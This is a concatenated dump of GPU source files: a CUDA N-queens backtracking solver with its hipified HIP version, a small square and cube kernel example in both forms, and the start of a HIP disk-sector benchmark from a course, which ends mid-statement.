sizeof(int) * steps / THREAD_NUM, hipMemcpyDeviceToHost); for(int j = 0; j < steps / THREAD_NUM; j++) { total += results[j]; } computed = false; } // start computation hipMemcpy(masks_cuda, total_masks, sizeof(int) * total_conditions, hipMemcpyHostToDevice); hipMemcpy(l_masks_cuda, total_l_masks, sizeof(int) * total_conditions, hipMemcpyHostToDevice); hipMemcpy(r_masks_cuda, total_r_masks, sizeof(int) * total_conditions, hipMemcpyHostToDevice); hipLaunchKernelGGL(( solve_nqueen_cuda_kernel), dim3(steps/THREAD_NUM), dim3(THREAD_NUM), 0, 0, n, n - mark, masks_cuda, l_masks_cuda, r_masks_cuda, results_cuda, total_conditions); computed = true; total_conditions = 0; } i--; } } else { i --; } } } } if(computed) { hipMemcpy(results, results_cuda, sizeof(int) * steps / THREAD_NUM, hipMemcpyDeviceToHost); for(int j = 0; j < steps / THREAD_NUM; j++) { total += results[j]; } computed = false; } hipMemcpy(masks_cuda, total_masks, sizeof(int) * total_conditions, hipMemcpyHostToDevice); hipMemcpy(l_masks_cuda, total_l_masks, sizeof(int) * total_conditions, hipMemcpyHostToDevice); hipMemcpy(r_masks_cuda, total_r_masks, sizeof(int) * total_conditions, hipMemcpyHostToDevice); hipLaunchKernelGGL(( solve_nqueen_cuda_kernel), dim3(steps/THREAD_NUM), dim3(THREAD_NUM), 0, 0, n, n - mark, masks_cuda, l_masks_cuda, r_masks_cuda, results_cuda, total_conditions); hipMemcpy(results, results_cuda, sizeof(int) * steps / THREAD_NUM, hipMemcpyDeviceToHost); for(int j = 0; j < steps / THREAD_NUM; j++) { total += results[j]; } total *= 2; if(n % 2 == 1) { computed = false; total_conditions = 0; index = (1 << (n - 1) / 2); m[0] |= index; mask[1] = index; l_mask[1] = index << 1; r_mask[1] = index >> 1; m[1] = (mask[1] | l_mask[1] | r_mask[1]); i = 1; while(i > 0) { if((m[i] & t_mask) == t_mask) { i--; } else { index = (m[i] + 1) & ~m[i]; m[i] |= index; if((index & t_mask) != 0) { mask[i + 1] = mask[i] | index; l_mask[i + 1] = (l_mask[i] | index) << 1; r_mask[i + 1] = (r_mask[i] | index) >> 1; m[i + 1] = (mask[i + 1] | l_mask[i + 1] | r_mask[i + 1]); i++; if(i == mark) { total_masks[total_conditions] = mask[i]; total_l_masks[total_conditions] = l_mask[i]; total_r_masks[total_conditions] = r_mask[i]; total_conditions++; if(total_conditions == steps) { if(computed) { hipMemcpy(results, results_cuda, sizeof(int) * steps / THREAD_NUM, hipMemcpyDeviceToHost); for(int j = 0; j < steps / THREAD_NUM; j++) { total += results[j]; } computed = false; } // start computation hipMemcpy(masks_cuda, total_masks, sizeof(int) * total_conditions, hipMemcpyHostToDevice); hipMemcpy(l_masks_cuda, total_l_masks, sizeof(int) * total_conditions, hipMemcpyHostToDevice); hipMemcpy(r_masks_cuda, total_r_masks, sizeof(int) * total_conditions, hipMemcpyHostToDevice); hipLaunchKernelGGL(( solve_nqueen_cuda_kernel), dim3(steps/THREAD_NUM), dim3(THREAD_NUM), 0, 0, n, n - mark, masks_cuda, l_masks_cuda, r_masks_cuda, results_cuda, total_conditions); computed = true; total_conditions = 0; } i--; } } else { i --; } } } if(computed) { hipMemcpy(results, results_cuda, sizeof(int) * steps / THREAD_NUM, hipMemcpyDeviceToHost); for(int j = 0; j < steps / THREAD_NUM; j++) { total += results[j]; } computed = false; } hipMemcpy(masks_cuda, total_masks, sizeof(int) * total_conditions, hipMemcpyHostToDevice); hipMemcpy(l_masks_cuda, total_l_masks, sizeof(int) * total_conditions, hipMemcpyHostToDevice); hipMemcpy(r_masks_cuda, total_r_masks, sizeof(int) * total_conditions, hipMemcpyHostToDevice); hipLaunchKernelGGL(( solve_nqueen_cuda_kernel), dim3(steps/THREAD_NUM), dim3(THREAD_NUM), 0, 0, n, n - mark, masks_cuda, l_masks_cuda, r_masks_cuda, results_cuda, total_conditions); hipMemcpy(results, results_cuda, sizeof(int) * steps / THREAD_NUM, hipMemcpyDeviceToHost); for(int j = 0; j < steps / THREAD_NUM; j++) { total += results[j]; } } hipFree(masks_cuda); hipFree(l_masks_cuda); hipFree(r_masks_cuda); hipFree(results_cuda); delete[] total_masks; delete[] total_l_masks; delete[] total_r_masks; delete[] results; bunk = 1; return total; } bool InitCUDA() { int count; hipGetDeviceCount(&count); if(count == 0) { fprintf(stderr, "There is no device.\n"); return false; } int i; for(i = 0; i < count; i++) { hipDeviceProp_t prop; if(hipGetDeviceProperties(&prop, i) == hipSuccess) { if(prop.major >= 1) { break; } } } if(i == count) { fprintf(stderr, "There is no device supporting CUDA 1.x.\n"); return false; } hipSetDevice(i); return true; } int main(int argc, char** argv) { unsigned int hTimer; double gpuTime; // initialise card and timer int deviceCount; CUDA_SAFE_CALL_NO_SYNC(hipGetDeviceCount(&deviceCount)); if (deviceCount == 0) { fprintf(stderr, "There is no device.\n"); exit(EXIT_FAILURE); } int dev; for (dev = 0; dev < deviceCount; ++dev) { hipDeviceProp_t deviceProp; CUDA_SAFE_CALL_NO_SYNC(hipGetDeviceProperties(&deviceProp, dev)); if (deviceProp.major >= 1) break; } if (dev == deviceCount) { fprintf(stderr, "There is no device supporting CUDA.\n"); exit(EXIT_FAILURE); } else CUDA_SAFE_CALL(hipSetDevice(dev)); CUT_SAFE_CALL( cutCreateTimer(&hTimer) ); int n = 12; clock_t start, end; long long solution; bool cpu = true, gpu = true; int argstart = 1, steps = 24576; if(argc >= 2 && argv[1][0] == '-') { if(argv[1][1] == 'c' || argv[1][1] == 'C') { gpu = false; } else if(argv[1][1] == 'g' || argv[1][1] == 'G') { cpu = false; } argstart = 2; } if(argc < argstart + 1) { printf("Usage: %s [-c|-g] n steps\n", argv[0]); printf(" -c: CPU only\n"); printf(" -g: GPU only\n"); printf(" n: n-queen\n"); printf(" steps: step for GPU\n"); printf("Default to 8 queen\n"); } else { n = atoi(argv[argstart]); if(n <= 1 || n > 32) { printf("Invalid n, n should be > 1 and <= 32\n"); printf("Note: n > 18 will require a very very long time to compute!\n"); return 0; } if(argc >= argstart + 2) { steps = atoi(argv[argstart + 1]); if(steps <= THREAD_NUM || steps % THREAD_NUM != 0) { printf("Invalid step, step should be multiple of %d\n", THREAD_NUM); return 0; } } } if(gpu) { if(!InitCUDA()) { return 0; } printf("CUDA initialized.\n"); } if(cpu) { CUDA_SAFE_CALL( hipDeviceSynchronize() ); CUT_SAFE_CALL( cutResetTimer(hTimer) ); CUT_SAFE_CALL( cutStartTimer(hTimer) ); //start = clock(); solution = solve_nqueen(n); //solve_nqueen_mcpu(n); //solution = solve_nqueen(n); //end = clock(); CUT_SAFE_CALL( cutStopTimer(hTimer) ); gpuTime = cutGetTimerValue(hTimer); printf("CPU: %d queen = %lld time = %f msec\n", n, solution, gpuTime); } if(gpu) { //start = clock(); CUDA_SAFE_CALL( hipDeviceSynchronize() ); CUT_SAFE_CALL( cutResetTimer(hTimer) ); CUT_SAFE_CALL( cutStartTimer(hTimer) ); solution = solve_nqueen_cuda(n, steps); //end = clock(); CUT_SAFE_CALL( cutStopTimer(hTimer) ); gpuTime = cutGetTimerValue(hTimer); printf("GPU: %d queen = %lld time = %f msec\n", n, solution, gpuTime); } return 0; }
122f8e2edebd52308521259b8f2f8588ac61c46e.cu
// N-queen for CUDA // // Copyright(c) 2008 Ping-Che Chen //#define WIN32_LEAN_AND_MEAN //#include <windows.h> #include <stdio.h> #include <cutil.h> #define THREAD_NUM 96 int bunk = 0; // this is a dummy variable used for making sure clock() are not optimized out /* * ---------------------------------------------------------------- * This is a recursive version of n-queen backtracking solver. * A non-recursive version is used instead. * ---------------------------------------------------------------- long long solve_nqueen_internal(int n, unsigned int mask, unsigned int l_mask, unsigned int r_mask, unsigned int t_mask) { if(mask == t_mask) { return 1; } unsigned int m = (mask | l_mask | r_mask); if((m & t_mask) == t_mask) { return 0; } long long total = 0; unsigned int index = (m + 1) & ~m; while((index & t_mask) != 0) { total += solve_nqueen_internal(mask | index, (l_mask | index) << 1, (r_mask | index) >> 1, t_mask); m |= index; index = (m + 1) & ~m; } return total; } long long solve_nqueen(int n) { return solve_nqueen_internal(0, 0, 0, (1 << n) - 1); } */ /* ------------------------------------------------------------------- * This is a non-recursive version of n-queen backtracking solver. * This provides the basis for the CUDA version. * ------------------------------------------------------------------- */ long long solve_nqueen(int n) { unsigned int mask[32]; unsigned int l_mask[32]; unsigned int r_mask[32]; unsigned int m[32]; if(n <= 0 || n > 32) { return 0; } const unsigned int t_mask = (1 << n) - 1; long long total = 0; long long upper_total = 0; int i = 0, j; unsigned int index; mask[0] = 0; l_mask[0] = 0; r_mask[0] = 0; m[0] = 0; for(j = 0; j < (n + 1) / 2; j++) { index = (1 << j); m[0] |= index; mask[1] = index; l_mask[1] = index << 1; r_mask[1] = index >> 1; m[1] = (mask[1] | l_mask[1] | r_mask[1]); i = 1; if(n % 2 == 1 && j == (n + 1) / 2 - 1) { upper_total = total; total = 0; } while(i > 0) { if((m[i] & t_mask) == t_mask) { i--; } else { index = ((m[i] + 1) ^ m[i]) & ~m[i]; m[i] |= index; if((index & t_mask) != 0) { if(i + 1 == n) { total++; i--; } else { mask[i + 1] = mask[i] | index; l_mask[i + 1] = (l_mask[i] | index) << 1; r_mask[i + 1] = (r_mask[i] | index) >> 1; m[i + 1] = (mask[i + 1] | l_mask[i + 1] | r_mask[i + 1]); i++; } } else { i --; } } } } bunk = 2; if(n % 2 == 0) { return total * 2; } else { return upper_total * 2 + total; } } /* ------------------------------------------------------------------- * This is a non-recursive version of n-queen backtracking solver * with multi-thread support. * ------------------------------------------------------------------- */ /* struct thread_context { HANDLE thread; bool stop; long long total; int n; unsigned int mask; unsigned int l_mask; unsigned int r_mask; unsigned int t_mask; HANDLE ready; HANDLE complete; }; DWORD WINAPI solve_nqueen_proc(LPVOID param) { thread_context* ctx = (thread_context*) param; unsigned int mask[32]; unsigned int l_mask[32]; unsigned int r_mask[32]; unsigned int m[32]; unsigned int t_mask; long long total; unsigned int index; unsigned int mark; for(;;) { WaitForSingleObject(ctx->ready, INFINITE); if(ctx->stop) { break; } int i = 0; mask[0] = ctx->mask; l_mask[0] = ctx->l_mask; r_mask[0] = ctx->r_mask; m[0] = mask[0] | l_mask[0] | r_mask[0]; total = 0; t_mask = ctx->t_mask; mark = ctx->n; while(i >= 0) { if((m[i] & t_mask) == t_mask) { i--; } else { index = (m[i] + 1) & ~m[i]; m[i] |= index; if((index & t_mask) != 0) { if(i + 1 == mark) { total++; i--; } else { mask[i + 1] = mask[i] | index; l_mask[i + 1] = (l_mask[i] | index) << 1; r_mask[i + 1] = (r_mask[i] | index) >> 1; m[i + 1] = (mask[i + 1] | l_mask[i + 1] | r_mask[i + 1]); i++; } } else { i --; } } } ctx->total = total; SetEvent(ctx->complete); } return 0; } long long solve_nqueen_mcpu(int n) { if(n <= 0 || n > 32) { return 0; } SYSTEM_INFO info; thread_context* threads; int num_threads; GetSystemInfo(&info); num_threads = info.dwNumberOfProcessors; if(num_threads == 1) { // only one cpu found, use single thread version return solve_nqueen(n); } threads = new thread_context[num_threads]; int j; for(j = 0; j < num_threads; j++) { threads[j].stop = false; threads[j].ready = CreateEvent(0, FALSE, FALSE, 0); threads[j].complete = CreateEvent(0, FALSE, TRUE, 0); threads[j].thread = CreateThread(0, 0, solve_nqueen_proc, threads + j, 0, 0); threads[j].total = 0; } int thread_idx = 0; const unsigned int t_mask = (1 << n) - 1; long long total = 0; unsigned int index; unsigned int m_mask = 0; if(n % 2 == 1) { m_mask = 1 << ((n + 1) / 2 - 1); } for(j = 0; j < (n + 1) / 2; j++) { index = 1 << j; WaitForSingleObject(threads[thread_idx].complete, INFINITE); if(threads[thread_idx].mask != m_mask) { total += threads[thread_idx].total * 2; } else { total += threads[thread_idx].total; } threads[thread_idx].mask = index; threads[thread_idx].l_mask = index << 1; threads[thread_idx].r_mask = index >> 1; threads[thread_idx].t_mask = t_mask; threads[thread_idx].total = 0; threads[thread_idx].n = n - 1; SetEvent(threads[thread_idx].ready); thread_idx = (thread_idx + 1) % num_threads; } // collect all threads... HANDLE* events = new HANDLE[num_threads]; for(j = 0; j < num_threads; j++) { events[j] = threads[j].complete; } WaitForMultipleObjects(num_threads, events, TRUE, INFINITE); for(j = 0; j < num_threads; j++) { if(threads[j].mask != m_mask) { total += threads[j].total * 2; } else { total += threads[j].total; } threads[j].stop = true; SetEvent(threads[j].ready); events[j] = threads[j].thread; } WaitForMultipleObjects(num_threads, events, TRUE, INFINITE); for(j = 0; j < num_threads; j++) { CloseHandle(threads[j].thread); CloseHandle(threads[j].ready); CloseHandle(threads[j].complete); } delete[] threads; delete[] events; bunk = 3; return total; } */ /* -------------------------------------------------------------------------- * This is a non-recursive version of n-queen backtracking solver for CUDA. * It receives multiple initial conditions from a CPU iterator, and count * each conditions. * -------------------------------------------------------------------------- */ __global__ void solve_nqueen_cuda_kernel(int n, int mark, unsigned int* total_masks, unsigned int* total_l_masks, unsigned int* total_r_masks, unsigned int* results, int total_conditions) { const int tid = threadIdx.x; const int bid = blockIdx.x; const int idx = bid * blockDim.x + tid; __shared__ unsigned int mask[THREAD_NUM][10]; __shared__ unsigned int l_mask[THREAD_NUM][10]; __shared__ unsigned int r_mask[THREAD_NUM][10]; __shared__ unsigned int m[THREAD_NUM][10]; __shared__ unsigned int sum[THREAD_NUM]; const unsigned int t_mask = (1 << n) - 1; int total = 0; int i = 0; unsigned int index; if(idx < total_conditions) { mask[tid][i] = total_masks[idx]; l_mask[tid][i] = total_l_masks[idx]; r_mask[tid][i] = total_r_masks[idx]; m[tid][i] = mask[tid][i] | l_mask[tid][i] | r_mask[tid][i]; while(i >= 0) { if((m[tid][i] & t_mask) == t_mask) { i--; } else { index = (m[tid][i] + 1) & ~m[tid][i]; m[tid][i] |= index; if((index & t_mask) != 0) { if(i + 1 == mark) { total++; i--; } else { mask[tid][i + 1] = mask[tid][i] | index; l_mask[tid][i + 1] = (l_mask[tid][i] | index) << 1; r_mask[tid][i + 1] = (r_mask[tid][i] | index) >> 1; m[tid][i + 1] = (mask[tid][i + 1] | l_mask[tid][i + 1] | r_mask[tid][i + 1]); i++; } } else { i --; } } } sum[tid] = total; } else { sum[tid] = 0; } __syncthreads(); // reduction if(tid < 64 && tid + 64 < THREAD_NUM) { sum[tid] += sum[tid + 64]; } __syncthreads(); if(tid < 32) { sum[tid] += sum[tid + 32]; } __syncthreads(); if(tid < 16) { sum[tid] += sum[tid + 16]; } __syncthreads(); if(tid < 8) { sum[tid] += sum[tid + 8]; } __syncthreads(); if(tid < 4) { sum[tid] += sum[tid + 4]; } __syncthreads(); if(tid < 2) { sum[tid] += sum[tid + 2]; } __syncthreads(); if(tid < 1) { sum[tid] += sum[tid + 1]; } __syncthreads(); if(tid == 0) { results[bid] = sum[0]; } } long long solve_nqueen_cuda(int n, int steps) { // generating start conditions unsigned int mask[32]; unsigned int l_mask[32]; unsigned int r_mask[32]; unsigned int m[32]; unsigned int index; if(n <= 0 || n > 32) { return 0; } unsigned int* total_masks = new unsigned int[steps]; unsigned int* total_l_masks = new unsigned int[steps]; unsigned int* total_r_masks = new unsigned int[steps]; unsigned int* results = new unsigned int[steps]; unsigned int* masks_cuda; unsigned int* l_masks_cuda; unsigned int* r_masks_cuda; unsigned int* results_cuda; cudaMalloc((void**) &masks_cuda, sizeof(int) * steps); cudaMalloc((void**) &l_masks_cuda, sizeof(int) * steps); cudaMalloc((void**) &r_masks_cuda, sizeof(int) * steps); cudaMalloc((void**) &results_cuda, sizeof(int) * steps / THREAD_NUM); const unsigned int t_mask = (1 << n) - 1; const unsigned int mark = n > 11 ? n - 10 : 2; long long total = 0; int total_conditions = 0; int i = 0, j; mask[0] = 0; l_mask[0] = 0; r_mask[0] = 0; m[0] = 0; bool computed = false; for(j = 0; j < n / 2; j++) { index = (1 << j); m[0] |= index; mask[1] = index; l_mask[1] = index << 1; r_mask[1] = index >> 1; m[1] = (mask[1] | l_mask[1] | r_mask[1]); i = 1; while(i > 0) { if((m[i] & t_mask) == t_mask) { i--; } else { index = (m[i] + 1) & ~m[i]; m[i] |= index; if((index & t_mask) != 0) { mask[i + 1] = mask[i] | index; l_mask[i + 1] = (l_mask[i] | index) << 1; r_mask[i + 1] = (r_mask[i] | index) >> 1; m[i + 1] = (mask[i + 1] | l_mask[i + 1] | r_mask[i + 1]); i++; if(i == mark) { total_masks[total_conditions] = mask[i]; total_l_masks[total_conditions] = l_mask[i]; total_r_masks[total_conditions] = r_mask[i]; total_conditions++; if(total_conditions == steps) { if(computed) { cudaMemcpy(results, results_cuda, sizeof(int) * steps / THREAD_NUM, cudaMemcpyDeviceToHost); for(int j = 0; j < steps / THREAD_NUM; j++) { total += results[j]; } computed = false; } // start computation cudaMemcpy(masks_cuda, total_masks, sizeof(int) * total_conditions, cudaMemcpyHostToDevice); cudaMemcpy(l_masks_cuda, total_l_masks, sizeof(int) * total_conditions, cudaMemcpyHostToDevice); cudaMemcpy(r_masks_cuda, total_r_masks, sizeof(int) * total_conditions, cudaMemcpyHostToDevice); solve_nqueen_cuda_kernel<<<steps/THREAD_NUM, THREAD_NUM>>>(n, n - mark, masks_cuda, l_masks_cuda, r_masks_cuda, results_cuda, total_conditions); computed = true; total_conditions = 0; } i--; } } else { i --; } } } } if(computed) { cudaMemcpy(results, results_cuda, sizeof(int) * steps / THREAD_NUM, cudaMemcpyDeviceToHost); for(int j = 0; j < steps / THREAD_NUM; j++) { total += results[j]; } computed = false; } cudaMemcpy(masks_cuda, total_masks, sizeof(int) * total_conditions, cudaMemcpyHostToDevice); cudaMemcpy(l_masks_cuda, total_l_masks, sizeof(int) * total_conditions, cudaMemcpyHostToDevice); cudaMemcpy(r_masks_cuda, total_r_masks, sizeof(int) * total_conditions, cudaMemcpyHostToDevice); solve_nqueen_cuda_kernel<<<steps/THREAD_NUM, THREAD_NUM>>>(n, n - mark, masks_cuda, l_masks_cuda, r_masks_cuda, results_cuda, total_conditions); cudaMemcpy(results, results_cuda, sizeof(int) * steps / THREAD_NUM, cudaMemcpyDeviceToHost); for(int j = 0; j < steps / THREAD_NUM; j++) { total += results[j]; } total *= 2; if(n % 2 == 1) { computed = false; total_conditions = 0; index = (1 << (n - 1) / 2); m[0] |= index; mask[1] = index; l_mask[1] = index << 1; r_mask[1] = index >> 1; m[1] = (mask[1] | l_mask[1] | r_mask[1]); i = 1; while(i > 0) { if((m[i] & t_mask) == t_mask) { i--; } else { index = (m[i] + 1) & ~m[i]; m[i] |= index; if((index & t_mask) != 0) { mask[i + 1] = mask[i] | index; l_mask[i + 1] = (l_mask[i] | index) << 1; r_mask[i + 1] = (r_mask[i] | index) >> 1; m[i + 1] = (mask[i + 1] | l_mask[i + 1] | r_mask[i + 1]); i++; if(i == mark) { total_masks[total_conditions] = mask[i]; total_l_masks[total_conditions] = l_mask[i]; total_r_masks[total_conditions] = r_mask[i]; total_conditions++; if(total_conditions == steps) { if(computed) { cudaMemcpy(results, results_cuda, sizeof(int) * steps / THREAD_NUM, cudaMemcpyDeviceToHost); for(int j = 0; j < steps / THREAD_NUM; j++) { total += results[j]; } computed = false; } // start computation cudaMemcpy(masks_cuda, total_masks, sizeof(int) * total_conditions, cudaMemcpyHostToDevice); cudaMemcpy(l_masks_cuda, total_l_masks, sizeof(int) * total_conditions, cudaMemcpyHostToDevice); cudaMemcpy(r_masks_cuda, total_r_masks, sizeof(int) * total_conditions, cudaMemcpyHostToDevice); solve_nqueen_cuda_kernel<<<steps/THREAD_NUM, THREAD_NUM>>>(n, n - mark, masks_cuda, l_masks_cuda, r_masks_cuda, results_cuda, total_conditions); computed = true; total_conditions = 0; } i--; } } else { i --; } } } if(computed) { cudaMemcpy(results, results_cuda, sizeof(int) * steps / THREAD_NUM, cudaMemcpyDeviceToHost); for(int j = 0; j < steps / THREAD_NUM; j++) { total += results[j]; } computed = false; } cudaMemcpy(masks_cuda, total_masks, sizeof(int) * total_conditions, cudaMemcpyHostToDevice); cudaMemcpy(l_masks_cuda, total_l_masks, sizeof(int) * total_conditions, cudaMemcpyHostToDevice); cudaMemcpy(r_masks_cuda, total_r_masks, sizeof(int) * total_conditions, cudaMemcpyHostToDevice); solve_nqueen_cuda_kernel<<<steps/THREAD_NUM, THREAD_NUM>>>(n, n - mark, masks_cuda, l_masks_cuda, r_masks_cuda, results_cuda, total_conditions); cudaMemcpy(results, results_cuda, sizeof(int) * steps / THREAD_NUM, cudaMemcpyDeviceToHost); for(int j = 0; j < steps / THREAD_NUM; j++) { total += results[j]; } } cudaFree(masks_cuda); cudaFree(l_masks_cuda); cudaFree(r_masks_cuda); cudaFree(results_cuda); delete[] total_masks; delete[] total_l_masks; delete[] total_r_masks; delete[] results; bunk = 1; return total; } bool InitCUDA() { int count; cudaGetDeviceCount(&count); if(count == 0) { fprintf(stderr, "There is no device.\n"); return false; } int i; for(i = 0; i < count; i++) { cudaDeviceProp prop; if(cudaGetDeviceProperties(&prop, i) == cudaSuccess) { if(prop.major >= 1) { break; } } } if(i == count) { fprintf(stderr, "There is no device supporting CUDA 1.x.\n"); return false; } cudaSetDevice(i); return true; } int main(int argc, char** argv) { unsigned int hTimer; double gpuTime; // initialise card and timer int deviceCount; CUDA_SAFE_CALL_NO_SYNC(cudaGetDeviceCount(&deviceCount)); if (deviceCount == 0) { fprintf(stderr, "There is no device.\n"); exit(EXIT_FAILURE); } int dev; for (dev = 0; dev < deviceCount; ++dev) { cudaDeviceProp deviceProp; CUDA_SAFE_CALL_NO_SYNC(cudaGetDeviceProperties(&deviceProp, dev)); if (deviceProp.major >= 1) break; } if (dev == deviceCount) { fprintf(stderr, "There is no device supporting CUDA.\n"); exit(EXIT_FAILURE); } else CUDA_SAFE_CALL(cudaSetDevice(dev)); CUT_SAFE_CALL( cutCreateTimer(&hTimer) ); int n = 12; clock_t start, end; long long solution; bool cpu = true, gpu = true; int argstart = 1, steps = 24576; if(argc >= 2 && argv[1][0] == '-') { if(argv[1][1] == 'c' || argv[1][1] == 'C') { gpu = false; } else if(argv[1][1] == 'g' || argv[1][1] == 'G') { cpu = false; } argstart = 2; } if(argc < argstart + 1) { printf("Usage: %s [-c|-g] n steps\n", argv[0]); printf(" -c: CPU only\n"); printf(" -g: GPU only\n"); printf(" n: n-queen\n"); printf(" steps: step for GPU\n"); printf("Default to 8 queen\n"); } else { n = atoi(argv[argstart]); if(n <= 1 || n > 32) { printf("Invalid n, n should be > 1 and <= 32\n"); printf("Note: n > 18 will require a very very long time to compute!\n"); return 0; } if(argc >= argstart + 2) { steps = atoi(argv[argstart + 1]); if(steps <= THREAD_NUM || steps % THREAD_NUM != 0) { printf("Invalid step, step should be multiple of %d\n", THREAD_NUM); return 0; } } } if(gpu) { if(!InitCUDA()) { return 0; } printf("CUDA initialized.\n"); } if(cpu) { CUDA_SAFE_CALL( cudaThreadSynchronize() ); CUT_SAFE_CALL( cutResetTimer(hTimer) ); CUT_SAFE_CALL( cutStartTimer(hTimer) ); //start = clock(); solution = solve_nqueen(n); //solve_nqueen_mcpu(n); //solution = solve_nqueen(n); //end = clock(); CUT_SAFE_CALL( cutStopTimer(hTimer) ); gpuTime = cutGetTimerValue(hTimer); printf("CPU: %d queen = %lld time = %f msec\n", n, solution, gpuTime); } if(gpu) { //start = clock(); CUDA_SAFE_CALL( cudaThreadSynchronize() ); CUT_SAFE_CALL( cutResetTimer(hTimer) ); CUT_SAFE_CALL( cutStartTimer(hTimer) ); solution = solve_nqueen_cuda(n, steps); //end = clock(); CUT_SAFE_CALL( cutStopTimer(hTimer) ); gpuTime = cutGetTimerValue(hTimer); printf("GPU: %d queen = %lld time = %f msec\n", n, solution, gpuTime); } return 0; }
4ade85d8bfa0bf3905e3ce48e599ba4dd48ec7b8.hip
// !!! This is a file automatically generated by hipify!!! #include <hip/hip_runtime.h> #include <hip/hip_runtime.h> #include <hip/hip_runtime_api.h> #include <math/cuda_ops.hpp> __global__ void square(int* d_out, const int base){ *d_out = base * base; } __global__ void cube(int* d_out, const int base){ *d_out = base * base * base; } int square_cuda(int base) { int BYTES = sizeof(int); // Declare pointer to cude in and out memory int h_out; int* d_out; // Allocate memory on the GPU hipMalloc((void**) &d_out, BYTES); // Start kernel hipLaunchKernelGGL(( square), dim3(1), dim3(1), 0, 0, d_out, base); // Copy the output data from device to host hipMemcpy(&h_out, d_out, BYTES, hipMemcpyDeviceToHost); // Free the device memory hipFree(d_out); return h_out; } int cube_cuda(int base) { int BYTES = sizeof(int); // Declare pointer to cude in and out memory int h_out; int* d_out; // Allocate memory on the GPU hipMalloc((void**) &d_out, BYTES); // Start kernel hipLaunchKernelGGL(( cube), dim3(1), dim3(1), 0, 0, d_out, base); // Copy the output data from device to host hipMemcpy(&h_out, d_out, BYTES, hipMemcpyDeviceToHost); // Free the device memory hipFree(d_out); return h_out; }
4ade85d8bfa0bf3905e3ce48e599ba4dd48ec7b8.cu
#include <cuda.h> #include <cuda_runtime.h> #include <cuda_runtime_api.h> #include <math/cuda_ops.hpp> __global__ void square(int* d_out, const int base){ *d_out = base * base; } __global__ void cube(int* d_out, const int base){ *d_out = base * base * base; } int square_cuda(int base) { int BYTES = sizeof(int); // Declare pointer to cude in and out memory int h_out; int* d_out; // Allocate memory on the GPU cudaMalloc((void**) &d_out, BYTES); // Start kernel square<<<1, 1>>>(d_out, base); // Copy the output data from device to host cudaMemcpy(&h_out, d_out, BYTES, cudaMemcpyDeviceToHost); // Free the device memory cudaFree(d_out); return h_out; } int cube_cuda(int base) { int BYTES = sizeof(int); // Declare pointer to cude in and out memory int h_out; int* d_out; // Allocate memory on the GPU cudaMalloc((void**) &d_out, BYTES); // Start kernel cube<<<1, 1>>>(d_out, base); // Copy the output data from device to host cudaMemcpy(&h_out, d_out, BYTES, cudaMemcpyDeviceToHost); // Free the device memory cudaFree(d_out); return h_out; }
9120fe38d32f8885d391d1bf984a6dade7c14e5f.hip
// !!! This is a file automatically generated by hipify!!! // // Toms Oliveira e Silva / Antnio Rui Borges // // ACA 2019/2020 // // Reference implementation 1 // #include <time.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include "common.h" #include <hip/hip_runtime.h> //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// // program configuration // #ifndef SECTOR_SIZE # define SECTOR_SIZE 512 #endif #ifndef N_SECTORS # define N_SECTORS (1 << 21) #endif static void modify_sector_cpu_kernel (unsigned int *sector_data, unsigned int sector_number, unsigned int n_sectors, unsigned int sector_size); __global__ static void modify_sector_cuda_kernel (unsigned int * __restrict__ sector_data, unsigned int * __restrict__ sector_number, unsigned int n_sectors, unsigned int sector_size); static double get_delta_time(void); //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// // Main program // int main (int argc, char **argv) { printf("%s Starting...\n", argv[0]); if (sizeof (unsigned int) != (size_t) 4) return 1; // fail with prejudice if an integer does not have 4 bytes // set up device int dev = 0; int i; hipDeviceProp_t deviceProp; CHECK (hipGetDeviceProperties (&deviceProp, dev)); printf("Using Device %d: %s\n", dev, deviceProp.name); CHECK (hipSetDevice (dev)); // create memory areas in host and device memory where the disk sectors data and sector numbers will be stored size_t sector_data_size; size_t sector_number_size; unsigned int *host_sector_data, *host_sector_number; unsigned int *device_sector_data, *device_sector_number; sector_data_size = (size_t) N_SECTORS * (size_t) SECTOR_SIZE; sector_number_size = (size_t) N_SECTORS * sizeof (unsigned int); if ((sector_data_size + sector_number_size) > (size_t) 1.3e9) { fprintf (stderr,"The GTX 1060 cannot handle more than 5.5GiB of memory!\n"); exit (1); } printf ("Total sector data size: %lu\n", sector_data_size); printf ("Total sector numbers data size: %lu\n", sector_number_size); host_sector_data = (unsigned int *) malloc (sector_data_size); host_sector_number = (unsigned int *) malloc (sector_number_size); CHECK (hipMalloc ((void **) &device_sector_data, sector_data_size)); CHECK (hipMalloc ((void **) &device_sector_number, sector_number_size)); // initialize the host data (void) get_delta_time (); srand(0xACA2019); for (i = 0; i < (int) (sector_data_size / (int) sizeof(unsigned int)); i++) host_sector_data[i] = 108584447u * (unsigned int) i; // "pseudo-random" data (faster than using the rand() function) for(i = 0; i < (int) (sector_number_size / (int)sizeof(unsigned int)); i++) host_sector_number[i] = (rand () & 0xFFFF) | ((rand () & 0xFFFF) << 16); printf ("The initialization of host data took %.3e seconds\n",get_delta_time ()); // copy the host data to the device memory (void) get_delta_time (); CHECK (hipMemcpy (device_sector_data, host_sector_data, sector_data_size, hipMemcpyHostToDevice)); CHECK (hipMemcpy (device_sector_number, host_sector_number, sector_number_size, hipMemcpyHostToDevice)); printf ("The transfer of %ld bytes from the host to the device took %.3e seconds\n", (long) sector_data_size + (long) sector_number_size, get_delta_time ()); // run the computational kernel // as an example, N_SECTORS threads are launched where each thread deals with one sector unsigned int gridDimX,gridDimY,gridDimZ,blockDimX,blockDimY,blockDimZ; int n_sectors, sector_size; n_sectors = N_SECTORS; sector_size = SECTOR_SIZE; blockDimX = 1 << 0; // optimize! blockDimY = 1 << 3; // optimize! blockDimZ = 1; // optimize! gridDimX = 1 << 12; // optimize! gridDimY = 1 << 6; // optimize! gridDimZ = 1; // optimize! if ((blockDimX * blockDimY * blockDimZ * gridDimX * gridDimY * gridDimZ) != N_SECTORS) { fprintf (stderr,"Wrong launch configuration!\n"); exit (1); } dim3 grid (gridDimX, gridDimY, gridDimZ); dim3 block (blockDimX, blockDimY, blockDimZ); (void) get_delta_time (); hipLaunchKernelGGL(( modify_sector_cuda_kernel) , dim3(grid), dim3(block), 0, 0, device_sector_data, device_sector_number, n_sectors, sector_size); CHECK (hipDeviceSynchronize ()); // wait for kernel to finish CHECK (hipGetLastError ()); // check for kernel errors printf("The CUDA kernel <<<(%d,%d,%d), (%d,%d,%d)>>> took %.3e seconds to run\n", gridDimX, gridDimY, 